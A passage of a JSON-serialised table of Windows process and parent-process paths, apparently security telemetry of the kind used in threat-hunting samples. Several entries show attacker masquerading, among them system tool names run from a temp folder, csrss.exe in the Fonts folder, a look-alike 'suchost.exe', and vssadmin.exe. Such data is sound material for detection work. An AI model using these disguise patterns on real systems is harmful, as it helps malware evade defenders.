md.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\"],\"ParentProcessName\":[\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\